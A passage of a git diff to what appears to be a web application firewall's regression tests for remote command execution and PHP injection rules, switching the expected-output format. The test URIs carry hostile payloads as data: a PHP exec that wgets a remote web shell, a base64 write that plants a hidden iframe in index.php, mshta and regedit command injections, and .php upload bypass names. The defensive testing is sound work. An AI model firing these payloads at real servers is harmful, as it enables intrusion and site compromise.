output: - log_contains: id "932331" + log: + expect_ids: [932331] - test_id: 2 desc: "Unix shell history invocation: last command" stages: @@ -33,4 +34,5 @@ tests: uri: "/get?rce=!!" version: HTTP/1.0 output: - log_contains: id "932331" + log: + expect_ids: [932331] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml index 7801af2f9..422afebd9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml @@ -19,7 +19,8 @@ tests: uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey" version: HTTP/1.0 output: - log_contains: id "932370" + log: + expect_ids: [932370] - test_id: 2 desc: "Windows Command Injection true negative test" stages: @@ -35,7 +36,8 @@ tests: uri: "/get?cmd=regedit%20" version: HTTP/1.0 output: - no_log_contains: id "932370" + log: + no_expect_ids: [932370] - test_id: 3 desc: "Windows Command Injection - bypass test" stages: @@ -51,7 +53,8 @@ tests: uri: "/get?cmd=;%20mshta%20http://example.com" version: HTTP/1.0 output: - log_contains: id "932370" + log: + expect_ids: [932370] - test_id: 4 desc: Windows Command Injection bypass with time negative test stages: @@ -68,4 +71,5 @@ tests: uri: "/get?foo=time+warner+" version: HTTP/1.1 output: - no_log_contains: id "932370" + log: + no_expect_ids: [932370] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml index 322c01ee4..8e4ad88c2 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml @@ -21,7 +21,8 @@ tests: uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt" version: HTTP/1.0 output: - log_contains: id "932380" + log: + expect_ids: [932380] - test_id: 2 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt @@ -39,7 +40,8 @@ tests: uri: "/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt" version: HTTP/1.0 output: - log_contains: id "932380" + log: + expect_ids: [932380] - test_id: 3 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot/r file.txt @@ -57,7 +59,8 @@ tests: uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt" version: HTTP/1.0 output: - log_contains: id "932380" + log: + expect_ids: [932380] - test_id: 4 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt @@ -75,7 +78,8 @@ tests: uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt" version: HTTP/1.0 output: - log_contains: id "932380" + log: + expect_ids: [932380] - test_id: 5 desc: | Windows shell command injection with 'sort' (false positive): sort%3Dex%26sort%3Dascending @@ -93,7 +97,8 @@ tests: uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349" version: HTTP/1.0 output: - no_log_contains: id "932380" + log: + no_expect_ids: [932380] - test_id: 6 desc: | Windows shell command injection with 'sort' (false positive): sort%3D0 @@ -111,7 +116,8 @@ tests: uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0" version: HTTP/1.0 output: - no_log_contains: id "932380" + log: + no_expect_ids: [932380] - test_id: 7 desc: "Windows shell command injection using 'bcdboot'" stages: @@ -127,7 +133,8 @@ tests: data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini" version: HTTP/1.0 output: - log_contains: id "932380" + log: + expect_ids: [932380] - test_id: 8 desc: False positive against 'time warner' stages: @@ -144,7 +151,8 @@ tests: uri: "/get?foo=time+warner+" version: HTTP/1.1 output: - no_log_contains: "id \"932380\"" + log: + no_expect_ids: [932380] - test_id: 9 desc: False positive against 'time for' stages: @@ -163,4 +171,5 @@ tests: data: | payload=While this is a challenging time for us all, we are busy helping customers manage playout infrastructure in ways that were just dreams only a couple of years ago. output: - no_log_contains: "id \"932380\"" + log: + no_expect_ids: [932380] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml index edc0a1e83..5c935e1e7 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml @@ -21,7 +21,8 @@ tests: uri: "/get?foo=<?exec('wget%20http://r57.biz/r57.txt%20-O" version: HTTP/1.0 output: - log_contains: id "933100" + log: + expect_ids: [933100] - test_id: 2 desc: PHP Injection Attack (933100) from old modsec regressions stages: @@ -40,7 +41,8 @@ tests: uri: "/get?foo=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E" version: HTTP/1.0 output: - log_contains: id "933100" + log: + expect_ids: [933100] - test_id: 3 desc: "PHP injection attack: looking for [/php] closing tag" stages: @@ -55,7 +57,8 @@ tests: uri: "/get?foo=somePhpWouldGoHere%5B%2Fphp%5D" version: HTTP/1.0 output: - log_contains: id "933100" + log: + expect_ids: [933100] - test_id: 4 desc: 'PHP injection attack: looking for [\php] closing tag' stages: @@ -70,7 +73,8 @@ tests: uri: "/get?foo=somePhpWouldGoHere%5B%5Cphp%5D" version: HTTP/1.0 output: - log_contains: id "933100" + log: + expect_ids: [933100] - test_id: 5 desc: | xml/php polyglot payload, using a PHP @@ -87,7 +91,8 @@ tests: uri: "/get?foo=%3C%3Fxml%20%3Aecho%201%3B" version: HTTP/1.0 output: - log_contains: id "933100" + log: + expect_ids: [933100] - test_id: 6 desc: | xml/php polyglot payload, using a PHP, uppercase test @@ -104,7 +109,8 @@ tests: uri: "/get?foo=%3C%3Fxml%20%3Aecho%201%3B" version: HTTP/1.0 output: - log_contains: id "933100" + log: + expect_ids: [933100] - test_id: 7 desc: | xml/php polyglot payload, using a PHP @@ -121,7 +127,8 @@ tests: uri: "/get?foo=%3C%3Fxml%20%3AfputCSV%28%24alreadyOpenFile%2C%20array%28%22foo%22%2C%20%22bar%22%2C%20%22hello%22%2C%20%22world%22%29%29%3B" version: HTTP/1.0 output: - log_contains: id "933100" + log: + expect_ids: [933100] - test_id: 8 desc: | xml/php polyglot payload, using a PHP @@ -138,4 +145,5 @@ tests: uri: "/get?foo=%3C%3Fxml%20%20%20%09%09%09%09%09%09%20%28%29%3Becho%201%3B" version: HTTP/1.0 output: - log_contains: id "933100" + log: + expect_ids: [933100] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml index 97afabe4a..c0aba7cb6 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml @@ -16,7 +16,8 @@ tests: uri: / version: "HTTP/1.1" output: - no_log_contains: id "933110" + log: + no_expect_ids: [933110] - test_id: 2 desc: PHP .php upload stages: @@ -31,7 +32,8 @@ tests: uri: /upload1 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 3 desc: PHP .php upload in X_Filename stages: @@ -46,7 +48,8 @@ tests: uri: /upload2 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 4 desc: PHP .php upload in X-File-Name stages: @@ -61,7 +64,8 @@ tests: uri: /upload3 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 5 desc: PHP .php.. upload stages: @@ -76,7 +80,8 @@ tests: uri: /upload4 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 6 desc: PHP .phtml upload stages: @@ -91,7 +96,8 @@ tests: uri: /upload version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 7 desc: PHP .phtml...... upload in X-File-Name stages: @@ -106,7 +112,8 @@ tests: uri: /upload version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 8 desc: PHP .php5 upload in X-File-Name stages: @@ -121,7 +128,8 @@ tests: uri: /upload version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 9 desc: PHP .php5 upload in X-File-Name stages: @@ -136,7 +144,8 @@ tests: uri: /upload version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 10 desc: PHP .php7 upload in X-File-Name stages: @@ -151,7 +160,8 @@ tests: uri: /upload version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 11 desc: PHP no file upload stages: @@ -165,7 +175,8 @@ tests: uri: / version: "HTTP/1.1" output: - no_log_contains: id "933110" + log: + no_expect_ids: [933110] - test_id: 12 desc: PHP php5... upload stages: @@ -180,7 +191,8 @@ tests: uri: /upload5 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 13 desc: PHP php5... upload in X_Filename stages: @@ -195,7 +207,8 @@ tests: uri: /upload6 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 14 desc: PHP .php. upload in X_Filename stages: @@ -210,7 +223,8 @@ tests: uri: /upload7 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 15 desc: PHP sfewfda.php............. upload stages: @@ -225,7 +239,8 @@ tests: uri: /upload8 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 16 desc: PHP script uploads stages: @@ -240,7 +255,8 @@ tests: uri: /upload version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 17 desc: PHP .php907............. upload stages: @@ -255,7 +271,8 @@ tests: uri: /upload version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 18 desc: PHP .phtml upload stages: @@ -270,7 +287,8 @@ tests: uri: /upload version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 19 desc: PHP .phtml987... upload passes in X_Filename stages: @@ -285,7 +303,8 @@ tests: uri: / version: "HTTP/1.1" output: - no_log_contains: id "933110" + log: + no_expect_ids: [933110] - test_id: 20 desc: PHP .php upload stages: @@ -300,7 +319,8 @@ tests: uri: /upload2 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 21 desc: PHP .php5... upload stages: @@ -315,7 +335,8 @@ tests: uri: /upload6 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 22 desc: PHP .php. upload stages: @@ -330,7 +351,8 @@ tests: uri: /upload7 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 23 desc: PHP .phtml987... upload passes in X.Filename stages: @@ -345,7 +367,8 @@ tests: uri: / version: "HTTP/1.1" output: - no_log_contains: id "933110" + log: + no_expect_ids: [933110] - test_id: 24 desc: PHP .phar upload stages: @@ -360,7 +383,8 @@ tests: uri: /upload7 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 25 desc: PHP .phps upload stages: @@ -375,7 +399,8 @@ tests: uri: /upload7 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 26 desc: PHP .pht upload stages: @@ -390,7 +415,8 @@ tests: uri: /upload7 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 27 desc: PHP .phpt upload stages: @@ -405,7 +431,8 @@ tests: uri: /upload7 version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 28 desc: PHP upload via multipart stages: @@ -428,7 +455,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: id "933110" + log: + expect_ids: [933110] - test_id: 29 desc: PHP upload via multipart should pass stages: @@ -451,7 +479,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - no_log_contains: id "933110" + log: + no_expect_ids: [933110] - test_id: 30 desc: PHP upload via multipart should pass stages: @@ -474,4 +503,5 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - no_log_contains: id "933110" + log: + no_expect_ids: [933110] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml index 6e82352b5..cf55f158f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml @@ -26,4 +26,5 @@ tests: ------WebKitFormBoundaryoRWIb3busvBrbttO-- version: HTTP/1.1 output: - log_contains: id "933111" + log: + expect_ids: [933111] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml index 82116d6ea..868003ce2 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml @@ -19,7 +19,8 @@ tests: data: "var=opcache.jit_max_polymorphic_calls%3d50" version: HTTP/1.0 output: - log_contains: id "933120" + log: + expect_ids: [933120] - test_id: 2 desc: "Test correct logging" stages: @@ -53,7 +54,8 @@ tests: data: "var=engine%3dtrue" version: HTTP/1.0 output: - log_contains: id "933120" + log: + expect_ids: [933120] - test_id: 4 desc: "PHP Injection Attack: Configuration Directive: extension" stages: @@ -70,7 +72,8 @@ tests: data: "var=extension%3dtrue" version: HTTP/1.0 output: - log_contains: id "933120" + log: + expect_ids: [933120] - test_id: 5 desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_retry_limit" stages: @@ -87,7 +90,8 @@ tests: data: "var=mbstring.regex_retry_limit%3dtrue" version: HTTP/1.0 output: - log_contains: id "933120" + log: + expect_ids: [933120] - test_id: 6 desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_stack_limit" stages: @@ -104,7 +108,8 @@ tests: data: "var=mbstring.regex_stack_limit%3dtrue" version: HTTP/1.0 output: - log_contains: id "933120" + log: + expect_ids: [933120] - test_id: 7 desc: "PHP Injection Attack: Configuration Directive: precision" stages: @@ -121,7 +126,8 @@ tests: data: "var=precision%3dtrue" version: HTTP/1.0 output: - log_contains: id "933120" + log: + expect_ids: [933120] - test_id: 8 desc: "PHP Injection Attack: Configuration Directive: smtp" stages: @@ -138,7 +144,8 @@ tests: data: "var=smtp%3dtrue" version: HTTP/1.0 output: - log_contains: id "933120" + log: + expect_ids: [933120] - test_id: 9 desc: "PHP Injection Attack: Configuration Directive: unserialize_max_depth" stages: @@ -155,4 +162,5 @@ tests: data: "var=unserialize_max_depth%3dtrue" version: HTTP/1.0 output: - log_contains: id "933120" + log: + expect_ids: [933120] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml index e0cf5b0df..29f0a94b7 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml @@ -18,7 +18,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "933130" + log: + no_expect_ids: [933130] - test_id: 2 desc: Trigger a basic request stages: @@ -33,7 +34,8 @@ tests: uri: "/get?x=$_SERVER['test'];" version: "HTTP/1.1" output: - log_contains: id "933130" + log: + expect_ids: [933130] - test_id: 3 desc: Non-Server Request stages: @@ -48,7 +50,8 @@ tests: uri: "/get?x=$_SE%20RVER['test'];" version: "HTTP/1.1" output: - no_log_contains: id "933130" + log: + no_expect_ids: [933130] - test_id: 4 desc: SERVER request URLEncoded stages: @@ -63,7 +66,8 @@ tests: uri: "/get?x=$_%53ERVER['test'];" version: "HTTP/1.1" output: - log_contains: id "933130" + log: + expect_ids: [933130] - test_id: 5 desc: SERVER request URLEncoded stages: @@ -78,7 +82,8 @@ tests: uri: "/get?%24_COOKIE=value;" version: "HTTP/1.1" output: - log_contains: id "933130" + log: + expect_ids: [933130] - test_id: 6 desc: SERVER index listed with obfuscated SERVER stages: @@ -93,4 +98,5 @@ tests: uri: "/get?x=$_%53%20ERVER['request_uri'];" version: "HTTP/1.1" output: - no_log_contains: id "933130" + log: + no_expect_ids: [933130] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml index 901d43f5d..4254ed3db 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?x=$_%53ERVER['test'];" version: "HTTP/1.1" output: - no_log_contains: id "933131" + log: + no_expect_ids: [933131] - test_id: 2 desc: SERVER request URLEncoded stages: @@ -33,7 +34,8 @@ tests: uri: "/get?%24_COOKIE=value;" version: "HTTP/1.1" output: - no_log_contains: id "933131" + log: + no_expect_ids: [933131] - test_id: 3 desc: SERVER index listed with obfuscated SERVER stages: @@ -48,4 +50,5 @@ tests: uri: "/get?x=$_%53%20ERVER['REQUEST_URI'];" version: "HTTP/1.1" output: - log_contains: id "933131" + log: + expect_ids: [933131] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml index 64ffb4460..0041e05dc 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml @@ -19,4 +19,5 @@ tests: data: "var=php://stdout" version: HTTP/1.0 output: - log_contains: id "933140" + log: + expect_ids: [933140] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml index 658a0fa21..5ab265a83 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml @@ -17,7 +17,8 @@ tests: uri: "/get/phpinfo" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 2 desc: base64_decode stages: @@ -32,7 +33,8 @@ tests: uri: "/get/base64_decode" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 3 desc: base64_decode mixed case stages: @@ -47,7 +49,8 @@ tests: uri: "/get?base64_deCOde" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 4 desc: bzdecompress stages: @@ -62,7 +65,8 @@ tests: uri: "/get?foo=bzdecomprEss" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 5 desc: call_user_func stages: @@ -77,7 +81,8 @@ tests: uri: "/get?foo=FOOcall_user_func" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 6 desc: fsockopen stages: @@ -92,7 +97,8 @@ tests: uri: "/get?foo=FOOfsockopen" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 7 desc: gzdecode stages: @@ -107,7 +113,8 @@ tests: uri: "/get?foo=FOOgzdecode" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 8 desc: GzInFlAtE stages: @@ -122,7 +129,8 @@ tests: uri: "/get?foo=FOOGzInFlAtE" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 9 desc: pHpInFo mixed case stages: @@ -137,7 +145,8 @@ tests: uri: "/get?foo=FOOpHpInFo" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 10 desc: gzuncompress stages: @@ -152,7 +161,8 @@ tests: uri: "/get?I%20don%27t%20like%20gzuncompress" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 11 desc: fsockopen stages: @@ -166,7 +176,8 @@ tests: uri: "/get?bar=pfsockopen%28%27foo%27%2C%2025%29" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 12 desc: posix_getpwuiD stages: @@ -181,7 +192,8 @@ tests: uri: "/get?bar=posix_getpwuiD%28%27foo%27%2C%2025%29" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 13 desc: shell_exec stages: @@ -197,7 +209,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 14 desc: ZlIb_DeCoDe stages: @@ -213,7 +226,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 15 desc: get_defined_functions stages: @@ -229,7 +243,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 16 desc: get_defined_vars stages: @@ -245,7 +260,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 17 desc: | PHP function call in body, mixed case. @@ -263,7 +279,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 18 desc: | PHP function call in body @@ -281,7 +298,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 19 desc: | PHP function call in body, mixed case @@ -299,7 +317,8 @@ tests: uri: "/post/print_r" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 20 desc: | PHP function call in body. @@ -317,7 +336,8 @@ tests: uri: "/post/strrev" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 21 desc: | False Positive test @@ -334,7 +354,8 @@ tests: uri: "/get?foo=the%20files%20%28yep%29" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 22 desc: | False Positive test, exec should be followed by parenthesis @@ -351,7 +372,8 @@ tests: uri: "/get?foo=exec%20%28" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 23 desc: | False Positive test @@ -368,7 +390,8 @@ tests: uri: "/get?foo=executor%28%29" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 24 desc: | False Positive test @@ -385,7 +408,8 @@ tests: uri: "/get?foo=cheval%28%24foo%29" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 25 desc: | False Positive test @@ -402,7 +426,8 @@ tests: uri: "/get?foo=audi%6ffile%28%24foo%29" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 26 desc: | False Positive test @@ -419,7 +444,8 @@ tests: uri: "/get?foo=the%20system%20is%20down%28%29" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 27 desc: | False Positive test @@ -436,7 +462,8 @@ tests: uri: "/get?foo=ecosystem%28%29" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 28 desc: | False Positive test, function doesn't exist @@ -453,7 +480,8 @@ tests: uri: "/get?foo=systems%28%29" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 29 desc: | False Positive test, function doesn't exist @@ -470,7 +498,8 @@ tests: uri: "/get?foo=system%20something%28%29" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 30 desc: "Snippets of English words (like `prev`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: @@ -485,7 +514,8 @@ tests: uri: "/post?a=preview" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 31 desc: "Snippets of English words (like `exp`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: @@ -500,7 +530,8 @@ tests: uri: "/post?a=exploration" version: "HTTP/1.1" output: - no_log_contains: id "933150" + log: + no_expect_ids: [933150] - test_id: 32 desc: | PHP mixed case function call with space, LF between (). @@ -517,7 +548,8 @@ tests: uri: "/get?foo=file_ExistS%20%28%0A%0A%29" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] - test_id: 33 desc: | PHP function call with multiple whitespaces. @@ -534,4 +566,5 @@ tests: uri: "/get?foo=fopen%20%20%28blah%29" version: "HTTP/1.1" output: - log_contains: id "933150" + log: + expect_ids: [933150] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml index 0d582b7e3..1dd59171d 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml @@ -17,7 +17,8 @@ tests: uri: "/get/array_diff%20%28" version: "HTTP/1.1" output: - log_contains: id "933151" + log: + expect_ids: [933151] - test_id: 2 desc: "pmf + chain" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?date_ADD%28%29" version: "HTTP/1.1" output: - log_contains: id "933151" + log: + expect_ids: [933151] - test_id: 3 desc: "non-dangerous PHP functions, removed to reduce FP" stages: @@ -47,7 +49,8 @@ tests: uri: "/get?foo=filemtime%28%24foo%29" version: "HTTP/1.1" output: - no_log_contains: id "933151" + log: + no_expect_ids: [933151] - test_id: 4 desc: "pmf + chain" stages: @@ -63,7 +66,8 @@ tests: data: "gethostbynamE(" version: "HTTP/1.1" output: - log_contains: id "933151" + log: + expect_ids: [933151] - test_id: 5 desc: "No parenthesis after keyword" stages: @@ -78,7 +82,8 @@ tests: uri: "/get?foo=array_diff" version: "HTTP/1.1" output: - no_log_contains: id "933151" + log: + no_expect_ids: [933151] - test_id: 6 desc: "rule should not trigger when there are other words before parenthesis" stages: @@ -93,7 +98,8 @@ tests: uri: "/get?a=ceiling%20height(9ft)" version: "HTTP/1.1" output: - no_log_contains: id "933151" + log: + no_expect_ids: [933151] - test_id: 7 desc: "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: @@ -108,7 +114,8 @@ tests: uri: "/get?a=preview" version: "HTTP/1.1" output: - no_log_contains: id "933151" + log: + no_expect_ids: [933151] - test_id: 8 desc: "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: @@ -123,4 +130,5 @@ tests: uri: "/get?a=exploration" version: "HTTP/1.1" output: - no_log_contains: id "933151" + log: + no_expect_ids: [933151] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index 986482f94..6ee4b956e 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml @@ -19,7 +19,8 @@ tests: uri: "/get?foo=chr%28123%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 2 desc: | PHP function call with variable as parameter. @@ -37,7 +38,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 3 desc: | PHP function call, CR, ($variable). @@ -55,7 +57,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 4 desc: | PHP function call, LF, ('value'). @@ -72,7 +75,8 @@ tests: uri: "/get?foo=exec%0A%28%27bar%27%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 5 desc: | PHP uppercase function call, CR, LF, (). @@ -89,7 +93,8 @@ tests: uri: "/get?foo=FILE%0D%0A%28%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 6 desc: | PHP function call with multiple whitespaces. @@ -106,7 +111,8 @@ tests: uri: "/get?foo=exec%20%20%28blah%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + 